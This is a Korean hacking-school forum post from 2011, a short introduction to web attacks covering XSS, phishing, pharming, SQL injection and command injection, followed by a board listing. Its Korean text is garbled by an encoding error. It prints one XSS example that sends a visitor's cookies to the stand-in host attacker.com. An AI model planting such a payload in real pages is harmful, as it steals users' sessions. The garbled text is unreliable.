1581, 4/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   »ç¿ëÁß
   http://www.cyworld.com/csy_lovely
   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1829 [º¹»ç]


1. Web hacking À¯Çü
Cross-Site Scripting(XSS)
°ø°Ý´ë»ó »çÀÌÆ®¿¡ °ø°ÝÀÚ »çÀÌÆ®¸¦ Å©·Î½º(°ÉÃļ­)½ÃÄѼ­ °ø°ÝÇÏ´Â ¹æ¹ý
<Cookie »©³»±â °ø°Ý ¿¹>
<script>document.location="http://attacker.com/attack/cookie attack.php?query="+document.cookie</script>
(À¥ ÆäÀÌÁö¿¡ ¾Ç¼ºÄڵ带 »ðÀÔÇÏ¿© Á¢±ÙÇϴ Ŭ¶óÀ̾ðÆ®¿¡ ÀÚµ¿½ÇÇà)
ÇÇ½Ì : °ø°ÝÀÚ°¡ Çǽ̸ÞÀÏÀ» ¹ß¼Û > victimÀÌ À̸ÞÀÏ ³»¿ë¿¡ ÇöȤ > ¸µÅ©µÇ¾î ÀÖ´Â »çÀÌÆ®¸¦ Ŭ¸¯
vkald : dnsÁ¶ÀÛÀ» ÅëÇÑ ÇÇ½Ì ¾÷±×·¹ÀÌµå ¹öÀü (web firewall¿¡¼­ Â÷´Ü ºÒ°¡´É)

Çǽ̰ú ÆĹÖÀÌ ¹®Á¦°¡ µÇ°íÀÖ´Â ±î´ß?  < money >

SQL Injection
À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡ ÀǵµÀûÀ¸·Î SQL¹®À» »ðÀÔÇÏ¿© ·Î±×ÀÎ ÀÎÁõ°úÁ¤À» ¿ìȸÇϰųª °ø°ÝÀÚ°¡ ¾ÇÀÇÀûÀÎ Äõ¸®¹®À» DB¿¡ º¸³»¾î ¹®Á¦¸¦ ¹ß»ý½ÃÅ´ (DBÁ¤º¸ À¯Ãâ¿¡¼­ Æ÷¸ä±îÁö ´Ù¾çÇÑ °ø°Ý°¡´É) À¥ ÇØÅ·Áß °¡Àå °­·ÂÇÑ°ø°Ý

Command Injection
À¥ ¾ÖÇø®ÄÉÀ̼ǿ¡¼­ HTML Çü½ÄÀ̳ª ÄíÅ°, URL ÆĶó¹ÌÅÍ Çü½ÄÀ¸·Î ½Ã½ºÅÛ ¸í·É¾î¸¦ »ðÀÔ Çã¿ëÇÔÀ¸·Î½á À¥ »ó¿¡¼­µµ ½Ã½ºÅÛ ¸í·ÉÀ» ½ÇÇàÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡

  Hit : 8695     Date : 2011/08/03 01:13



    
hackerÅ×µð Àß”f½À´Ï´Ù °¨»çÇÕ´Ï´ç 2011/09/10  
1521   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 4[13]     ¼ÒÀ¯
09/05 16545
1520   ³×Æ®¿öÅ© °³³ä ÈÖ¾îÀâ±â 7[8]     ¼ÒÀ¯
09/16 12146
1519   ÁÁÀº ºñ¹Ð¹øÈ£¶õ???[24]     ¼ÒÀ¯
09/04 19430
1518   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 3[13]     ¼ÒÀ¯
09/04 16920
1517   À¯Ä¡¿ø ¸¸È­ Å©°Ôº¸±â[11]     ¼ÒÀ¯
09/03 18429
1516   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 1[77]     ¼ÒÀ¯
09/02 34836
1515   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 2[26]     ¼ÒÀ¯
09/03 21470
1514   ¹öÆÛ ¿À¹ö Ç÷ο쿡 °üÇؼ­(¼ÓĪ BOF)[1]     »ç¿ù
09/11 9079
1513   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (8)[3]     »ç¿ëÁß
08/03 8156
1512   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (7)[1]     »ç¿ëÁß
08/03 8689
1511   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (6)[1]     »ç¿ëÁß
08/03 7771
1510   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (5)[2]     »ç¿ëÁß
08/03 8954
1509   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (4)      »ç¿ëÁß
08/03 8204
1508   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (3)[1]     »ç¿ëÁß
08/03 7733
  À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (2)[1]     »ç¿ëÁß
08/03 8694
1506   À¥ ÇØÅ·¿¡´ëÇؼ­ ¾Ë¾Æº¸ÀÚ (1)[7]     »ç¿ëÁß
08/03 8646
1505   ¸®´ª½º(9) ¸®´ª½º ¸í·É¾î 1~8     »ç¿ëÁß
08/02 8588
1504   < ¸®´ª½º ÂüÁ¶ °¡À̵å > 4     »ç¿ëÁß
08/02 7613
1503   < ¸®´ª½º ÂüÁ¶ °¡À̵å > 3      »ç¿ëÁß
08/02 7586
1502   < ¸®´ª½º ÂüÁ¶ °¡À̵å > 2     »ç¿ëÁß
08/02 7398
[1][2][3] 4 [5][6][7][8][9][10]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org